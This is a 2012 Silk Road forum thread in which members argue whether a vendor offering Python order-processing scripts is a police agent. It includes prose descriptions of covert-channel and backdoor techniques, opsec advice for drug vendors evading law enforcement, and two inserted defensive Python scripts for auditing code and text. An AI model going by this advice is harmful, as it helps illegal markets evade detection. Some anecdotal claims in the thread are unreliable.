B: The exploit may not be in the actual software, ever. The malware could be in the related pieces of software you need to acquire to make it 'work'. e.g. HTMLDOCs. This was an exploit achieved by the Vietnamese Secret Service against Tor users a few years ago. People downloaded Tor and it was fine. But they needed to download a language set for Vietnamese for the Windows operating system. Turned out the backdoor was in that language set they downloaded, and everybody who was reading Vietnamese on Windows had become part of the Vietnamese Secret Service's botnet.

C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.

D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programmers could be caught out if they are not trained to analyze potentially malicious code. Code analysis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.

Don't expect an exploit to be straight forward. They are deliberately engineered to obfuscate the origin of the exploit. That is kind of the entire point of an exploit.

Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:

A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
B. It is, of course, entirely open source
C. Preferably, the source code is posted in a thread on this very forum
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P

failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.

Exactly.

I'll second that!!   Nothing has been said to prove that Cypher is anything of the kind. He is not the only vendor who provides "software", would you trust any of these products more or less:

http://silkroadvb5piz3r.onion/index.php/silkroad/item/b9eced345d
http://www.silkroadvb5piz3r.onion/index.php/silkroad/item/3e4be45be5

Fact is python code is not too hard to go through if you know some code. These facts aside I am not saying that any of these products have backdoors or trojans in them. I sure as heck wouldn't trust a VM that someone sold me off of SR to use to do anything illegal. According to Sands, Cypher's code was produced initially for vendor and does work.

Mr www.hiddenservice.onion you've got to be joking. "Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single picosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!

Your operational security, I would not pay for it with somebody else's money.
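
Reason A in the post above (what you get today may not be what you get tomorrow) is the one point in the list that can be checked mechanically: recipients of a source distribution can each reduce their copy to one digest and compare. The following is an added example, not code from the thread or from the software under discussion; the file names and contents are constructed, and matching digests show only that two people received the same bytes, not that those bytes are safe.

```python
import hashlib
import json
import os
import tempfile


def file_sha256(path):
    """SHA-256 of one file, read in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_manifest(root):
    """Map every file under root (relative, '/'-separated path) to its hash.

    Symlinks are recorded by target instead of being followed, so a link
    pointing outside the tree shows up in the manifest.
    """
    manifest = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.islink(full):
                manifest[rel] = "symlink->" + os.readlink(full)
            elif os.path.isfile(full):
                manifest[rel] = file_sha256(full)
    return manifest


def tree_digest(manifest):
    """One digest for the whole tree, over a canonical JSON encoding."""
    blob = json.dumps(manifest, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(blob.encode("utf-8")).hexdigest()


def diff_manifests(old, new):
    """Which paths were added, removed or changed between two copies."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def build_sample_tree(root, tampered):
    """Write a small constructed distribution; 'tampered' alters it slightly."""
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    files = {
        "README.txt": b"constructed sample distribution\n",
        "tool.py": b"import csv\nprint('labels')\n",
        "lib/util.py": b"def clean(s):\n    return s.strip()\n",
    }
    if tampered:
        # Constructed difference: one extra line and one extra file.
        files["tool.py"] = b"import csv\nimport extra\nprint('labels')\n"
        files["lib/extra.py"] = b"# constructed extra module\n"
    for rel, data in files.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        first = os.path.join(tmp, "copy_received_by_first_user")
        later = os.path.join(tmp, "copy_received_by_later_user")
        build_sample_tree(first, tampered=False)
        build_sample_tree(later, tampered=True)
        m1, m2 = tree_manifest(first), tree_manifest(later)
        print("first :", tree_digest(m1))
        print("later :", tree_digest(m2))
        print("diff  :", diff_manifests(m1, m2))
```
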

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 03:30 am
*If* it were open source,

It is.

This is a technicality, you know exactly what I mean by it, it's not 'open' if it's not visible for auditing *before* anybody uses it.

I'll tell you what, I'll speak to DPR about independently vetting it offline.  Would that be good enough?

Louis, if DPR himself came down from the clouds in a blaze of heavenly glory on a magnificent green camel and said the code was legitimate but that we couldn't independently audit it, it still wouldn't count for much. This is because DPR's account could be compromised. Not to mention because even if DPR was posting (lest we forget Sabu) to say it was legitimate, it still doesn't prove anything. This is because we would be trusting in somebody. We assume everybody here is a potential LE agent or could become one, that is why this system works. I know you know this, I'm just making a mini-tutorial on how darknet markets are supposed to operate for any others watching this thread who don't know.

*if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work.

I reckon it can, that's why I'm bothering to do this.

Oh really? Tell me, how precisely is that supposed to work?

Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software.

The market is certainly a niche one.  Especially when it may not be worth it for smaller volume vendors.

I may come up with something for buyers later, but my focus is just this for now.

Uh huh. I bet.

possibly with a anonymous bitcoin 'tip jar' available.

The return on that would be insignificant

Whether or not that is true, it is contradictory to claim you want more money, and then target a market so insignificant. I think SRarians are more generous than you imagine, especially a collection of bitcoin rich vendors over time, but that's beside the point. You have to reconcile two opposites for your offer to make sense, so it doesn't. But your business acumen is also not the main issue.

The main issue is that you wanted the big vendors to acquire your software and run it, and that this software was not capable of being audited on this forum, and that even if it was visible, there are still the questions of whether some sneaky side channel attack wouldn't be made since the software relies on downloading new unknown pieces of software, which could easily contain exploits delivered exclusively on those dependencies downloaded through the Tor network. Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.

Indeed, the exploit doesn't necessarily even need to communicate the IP over the network without the aid of the vendor. The software could cleverly adjust the whitespace count of a PGP plaintext message so that it contained IP address information. Then the LE buyer could extract the IP address directly from the decrypted message. Very simple, very effective, almost impossible to catch on the fly. You wouldn't even need to target the encryption software this way.

To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.

I know that the code will pass any audit, that it does not connect to any other systems from where it is run and does not re-implement OpenPGP (it calls GPG to decrypt multiple files simultaneously using the --decrypt-files flag I mentioned in Peach's thread).

As I mentioned briefly above, there is a multitude of non-obvious ways of compromising a system because you're using somebody else's code. Any software dependencies could themselves contain an exploit, and it can be a multi-stage process. It could be the whitespace insertion/removal plaintext encoding trick, replacement of characters with esoteric unicode char synonyms, there's an entire universe of possibilities. Just because pine might not see if pine examines the code personally doesn't mean much either. Exploits are like a magician's magic trick. It's the one thing you don't think of, that makes it seem like an impossibility.

But LouisCyphre *already* knows this. He has to. Nobody could be involved in IT security at any level and not know this.

There's more than one way to distribute open source software and it does not require giving it away.

I never disputed that. This is just a way to sidetrack the discussion. There is a BIG difference between what is acceptable on a civilian forum, and on a forum of international drug smugglers.

That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.

Complete and utter bullshit, both regarding me and the software.

All the software does is this (with user interaction):

1)  The vendor logs into SR, views their order page and selects the order data (which is a HTML table).
2)  The vendor copies the entire table into a spreadsheet (e.g. LibreOffice Calc) and saves it.
3)  The vendor edits out the entries containing no encrypted data and saves all the entries containing encrypted data in the address field into a new CSV file called cryptorders.csv.
4)  The vendor opens the original spreadsheet in no. 2 and does the same thing for unencrypted data, saved as clearorders.csv.
5)  The vendor runs the first script which reads the CSV and saves separate files named according to the buyer's username, the transaction number and writes the content of the address field to that text file.  It then invokes GPG (gpg --decrypt-files *.asc) to decrypt the encrypted data.
6)  The vendor then runs the second script to review *.txt and make sure those files only contain names and addresses for printing.
7)  The next major piece of code rewrites all of those addresses as basic HTML.  That HTML is then converted to PDF using a third party program which needs to be installed (HTMLDOC, which is released under GPLv2 and is available at www.htmldoc.org).
8)  Then the labels/envelopes are printed.

Currently the Python code uses the csv module and basic Python functions, mainly involving lists, reading files and writing new files.

I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.

And again, for emphasis, it doesn't matter if pine cannot figure out where the exploit is hiding. The fact remains that you've made an incredibly incriminating move on these forums. One that would have been blatantly obvious to any IT security professional, and since you have such expertise, you cannot then go and claim ignorance.

The LE accusation only holds true if the code can somehow report on users, which it doesn't. 

We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.

It can quite easily run on a completely disconnected system.  It makes no difference to the program.

Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.

Pine, this is the second time you've accused me of being LE based on a misunderstanding of software.  The first time was not understanding how GPG verifies signatures.  You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.

I did not accuse you of being a LE agent before. I merely stated I had to validate your claims that GPG worked the way you said it did. That was possible in that instance.

In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphere Software Apologists are going to make that go away.


Gladly.  Got any other questions I haven't addressed already?

^  Try explaining how 3 different attacks can be addressed using available evidence without us auditing the software on this forum.

A: Simple Bait 'n Switch.
B: Whitespace/character adjustment/replacement to communicate invisible data via the vendors themselves.
C: Software dependency backdoors.

And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact. This is not a court of law, we don't have innocent until proven guilty here. Again, not relying on human trust is the lynchpin of the darknet markets. Everybody is potentially LE agents, some more so than others, since they intend to upload non-audited software anonymously to big drug dealers online and expect nobody will have a qualm about how sketchy that looks.
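
Attack B in the list above (whitespace and character replacement carrying hidden data in text that a person then forwards) is hard to see by eye but straightforward to check for before text leaves a machine. This is an added example, not code from the thread or from the software being argued about; the sample text, function names and finding labels are constructed, and the script check is a coarse heuristic based on Unicode character names.

```python
import re
import unicodedata


def _script(ch):
    """Coarse script tag from the Unicode name (LATIN, CYRILLIC, GREEK, ...)."""
    if not ch.isalpha():
        return None
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else None


def audit_text(text):
    """Return (line_number, kind, detail) for each covert-channel carrier found."""
    findings = []
    raw_lines = text.split("\n")
    crlf = sum(1 for raw in raw_lines[:-1] if raw.endswith("\r"))
    if 0 < crlf < len(raw_lines) - 1:
        # Alternating CRLF/LF endings can themselves encode bits.
        findings.append((0, "mixed-line-endings", "%d CRLF lines" % crlf))
    for lineno, raw in enumerate(raw_lines, start=1):
        line = raw[:-1] if raw.endswith("\r") else raw
        stripped = line.rstrip()
        if stripped != line:
            findings.append((lineno, "trailing-whitespace", repr(line[len(stripped):])))
        if re.search(r"\S {2,}\S", line):
            findings.append((lineno, "space-run", "two or more spaces between words"))
        if "\t" in line:
            findings.append((lineno, "tab", "tab character"))
        for ch in line:
            cat = unicodedata.category(ch)
            code = "U+%04X" % ord(ch)
            if cat == "Cf":
                findings.append((lineno, "invisible-char", code))
            elif cat == "Zs" and ch != " ":
                findings.append((lineno, "odd-space", code))
            elif unicodedata.normalize("NFKC", ch) != ch:
                findings.append((lineno, "compat-form", code))
        for word in re.findall(r"\w+", line):
            scripts = {s for s in map(_script, word) if s}
            if len(scripts) > 1:
                findings.append((lineno, "mixed-script", "+".join(sorted(scripts))))
    return findings


def canonicalize(text):
    """Rewrite text so whitespace and invisible characters carry no information.

    Look-alike letters from another script survive this step, so run
    audit_text() on the result as well.
    """
    out = []
    for line in unicodedata.normalize("NFKC", text).replace("\r\n", "\n").split("\n"):
        line = "".join(ch for ch in line if unicodedata.category(ch) != "Cf")
        out.append(re.sub(r"\s+", " ", line).strip())
    return "\n".join(out)


# Constructed sample text (not real data).
CLEAN = "J. Doe\n12 Example Street\nSpringfield 00000\n"
TAMPERED = (
    "J. Doe \n"                   # one trailing space
    "12  Example Street\n"        # doubled space
    "Spring\u200bfield 00000\n"   # zero-width space inside a word
    "Ex\u0430mple Town\n"         # Cyrillic 'a' in a Latin word
)

if __name__ == "__main__":
    for finding in audit_text(TAMPERED):
        print(finding)
    print(audit_text(canonicalize(TAMPERED)))
```
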
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 03:44 am
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.

Exactly!  Also, I figured that using any other license wouldn't matter if others who receive the code release it anyway, so I selected a license that guarantees other changes be able to be released.

I didn't choose the GPL Affero v3 because that would require publicly releasing every version, including customised ones for specific clients.  For example, the version currently available is version 1.1, but version 1.0 doesn't have the code for handling plain text orders only because the vendor who initially contacted me cancels unencrypted orders.

Obviously the GPLv3 does not prevent selling code released under that license.  Without going into specifics, I've discussed this with RMS face-to-face, but all this can be confirmed from the Free Software Foundation.

The GPLv3 simply grants certain rights to users and the obligation that the source be made available with the distribution.  Since the distribution *is* the source code (Python executables are great like that), then that obligation is covered.

What a complete red herring this is. It wouldn't matter if Linus Torvalds and Bill Gates both signed off on the deal :D

I admit I didn't notice what particular "license" was being used. And it doesn't matter one fucking jot because source doesn't need be closed in order to contain or be connected to some exploit. It just needs not enough people to be observant enough to catch it in time. That's all it requires. Surely people don't expect that LouisCyphre expected us to be having this discussion...? In his view, a bunch of vendors should have just run his half a dozen or so files without a single quibble.
Quote
is it even possible to make python programs closed source? What is it, bytecode?

No, it's just .py and .sh scripts which are executable.  The closed source claim is a red herring to back up the LE false assumption.

^because pine is le, been trying to tell you guys that.

You're welcome to your opinion, but please hold off on the accusations without proof.

Now you see it, now you don't. Interesting.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: wizdom on September 06, 2012, 04:00 am
Open source. Licenses. Rules. WTF? We sell fucking drugs here. There are hacked websites and programs and stolen shit galore!

Why would anyone give a crap about proper code license?

I used to wear a sheep skin just to sneak up on those tasty little lambs.


-- The Wolf


(AKA Modzi)
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 04:02 am
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)

I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only.

If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it.

Precisely. That coupled with the price point/target audience Louis set out in his advertisement would have, if successful, been installed on all the large vendors on here. How people cannot see the absurdity of this on a forum of international drug dealers I do not quite comprehend.

I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pine's concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).

I am guilty of not using semantics appropriately here, nothing more. All the actual facts remain the same. This GPL thing is a distraction from those.

My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.

You see:

Quote
open source and the code is available for everyone here to audit

That is what I meant by open source. That the code was closed source because it could not be analyzed by everybody here independently.

Technically, yes, this is incorrect semantics, code can be open source but still not viewable to the general public. Albeit I could argue that defies the spirit of what "open" is supposed to mean, but that's a discussion for a different day. If this were a normal forum, this would be for the birds. It is not, and so it is not.

Again, none of the above should have any bearing on this discussion because at *worst* Pine is guilty of being wrong about a technicality or even possibly not knowing a programming language, and at *best* Louis Cyphere is guilty of being exceptionally naive for an IT security conscious person and abusing the good reputation he's built up by encouraging others to adopt systems that must be insecure by default. And you know the worst case.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 04:09 am
Quote
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated.  Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC.  I'm basing this opinion on my experience with PGP Club and GPG instruction in other threads and via PMs.

And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.

Quote
There's nothing in the GPL which prevents selling the code under that license.  In fact, here's the part of the FAQ which relates to it:

Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.

Quote
I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.

Quote
It's possible to compile Python code as a Windows executable, but that's not what this is.  I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb.  Ridiculous.  I'd rather just install Python, if it's not already installed, and run the code.

I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward.  I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.

It is possible to make a windows executable out of a Ruby script as well, but it contains the actual script and a ruby interpreter inside of it ;). I have no real idea, but I wouldn't be surprised if it is the same thing with python. Yeah I also think it is pretty straight forward to reverse engineer bytecode, but I was trying to imagine what a closed source python program would look like. I don't know Python but I do know Ruby and even the .exe's contain the source code in them, they are a cheap gimmick that packages an interpreter and the script into a single executable file.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 04:16 am
Quote
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programmers could be caught out if they are not trained to analyze potentially malicious code. Code analysis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.

It is much harder to hide something in a python script than in say C or C++ source code.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 04:21 am
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If it's clean and it works, we will see!

Unfortunately for us all it is not so simple, for the reasons I have posted in my responses, this won't show or prove anything at all.

I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pine's concern,

I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

Haha, wow, what a redirection. Nice try.

To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage with just those components cannot contain an exploit for you to worry about because it's not even programming code.

And if SR indeed did offer up its server side code as open source, LE would surely be delighted to examine it for weaknesses.

You see, SR *may* use software as a base that is open source in and of itself, but this does not imply you should make open source the specific way in which you're making use of the said open source software. It's apples and oranges. If this was a real war, it'd be like the difference between the enemy knowing you have tanks, and the enemy actually knowing the tank placements. Again, LouisCyphre surely already knows this.

Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: wretched on September 06, 2012, 04:44 am
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If it's clean and it works, we will see!
now, IF he were LE, then he could release one version of the code into the wild to be audited, while selling another because it "includes support" there would be no way of knowing whether the code being audited is the same as the one being sold.

and I agree with kmf that anyone capable of auditing the code is equally capable of writing it, so the market for your "closed" (by pine's definition not having the source before running it) software is only the low hanging fruit, which is notoriously LE's favorite target.

I will now step away from this drama.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: wretched on September 06, 2012, 04:49 am
Quote from: LouisCyphre on Today at 12:06 AM

    The LE accusation only holds true if the code can somehow report on users, which it doesn't.


We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.

OK I could help myself, but this kind of reminds me of the Mitt Romney tax return nonsense. take my word for it!
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 05:15 am
Quote
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

Well you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program, especially if it is not severely restricted in what it is allowed to do on your system (such as javascript is). In short, going to a pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).

Quote
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage with just those components cannot contain an exploit for you to worry about because it's not even programming code.

It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well strictly speaking the php code doesn't but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browser's HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and vulnerabilities like this are few and far between, although it was not that long ago I remember reading about a html based exploit against firefox.

Quote
And if SR indeed did offer up its server side code as open source, LE would surely be delighted to examine it for weaknesses.

And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much php experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with, for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apache is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling apache as one would benefit security or the hardware requirements to take full advantage of it etc.....
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 06, 2012, 05:20 am
who knows, who cares.


if you want to download the program and get ass fucked for the next 60-life, then so be it.
if you want to enjoy buying and selling drugs over the internet for the next 60-life, then so be it.



LE or not LE.
FUCK IT.

/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: kmfkewm on September 06, 2012, 05:22 am
just looked it up, seems Ubuntu does have apache compiled as position independent since version 9.04 so that is a big plus. Hopefully SR server has a 64 bit processor to take advantage of that.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: BigEasy on September 06, 2012, 05:26 am
I'll second that!! Nothing has been said to prove that Cypher is anything of the kind. He is not the only vendor who provides "software", would you trust any of these products more or less:

http://silkroadvb5piz3r.onion/index.php/silkroad/item/b9eced345d
http://www.silkroadvb5piz3r.onion/index.php/silkroad/item/3e4be45be5

Fact is python code is not too hard to go through if you know some code. These facts aside I am not saying that any of these products have backdoors or trojans in them. I sure as heck wouldn't trust a VM that someone sold me off of SR to use to do anything illegal. According to Sands, Cypher's code was produced initially for a vendor and does work.

Mr www.hiddenservice.onion you've got to be joking.

pardon my typo

"Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!

Your operational security, I would not pay for it with somebody else's money.

I think you misunderstood me Pine, I meant that of course it would be even easier for these VM's to hide trojan's and wouldn't use them EVER.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 05:46 am
Quote
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

Well you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program, especially if it is not severely restricted in what it is allowed to do on your system (such as javascript is). In short, going to a pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).

What are those serverside pieces of code that find their way into the client's main memory/HD? That's a bolt from the blue for pine. I thought something like that would be essentially illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.

Quote
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage with just those components cannot contain an exploit for you to worry about because it's not even programming code.

It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well strictly speaking the php code doesn't but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browser's HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and vulnerabilities like this are few and far between, although it was not that long ago I remember reading about a html based exploit against firefox.

HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.

Anyway, this is not helping my already high paranoia levels today, so I'm not sure I should be asking you any more questions right now :D

Quote
And if SR indeed did offer up its server side code as open source, LE would surely be delighted to examine it for weaknesses.

And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much php experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with, for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apache is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling apache as one would benefit security or the hardware requirements to take full advantage of it etc.....

Sure, I agree on general principles about auditing (but it's got to be seriously tricky to do it with a hidden service like SR), but it'd be wrong to just give it all to everybody at once when you're also running a live system based on that exact configuration/implementation. Which would imply you'd have to take SR down in order to audit it every so often when changes are necessary. All tricky stuff which could introduce more bugs, either accidentally or deliberately via malicious auditors.
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: THUMBSuP. on September 06, 2012, 05:55 am
LE or not LE.
Louis has a bad attitude.



if he is trying to better the community, more power.
if he is trying to belittle the community, less power.


:(
/thumbs
Title: Re: Say hello to our resident LE Agent. Deciphering LouisCyphre.
Post by: pine on September 06, 2012, 05:57 am
"Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!

Your operational security, I would not pay for it with somebody else's money.

I think you misunderstood me Pine, I meant that of course it would be even easier for these VM's to hide trojan's and wouldn't use them EVER.

Aha. Then we are agreed on that.

A general point I neglected to mention which may explain some of this situation:

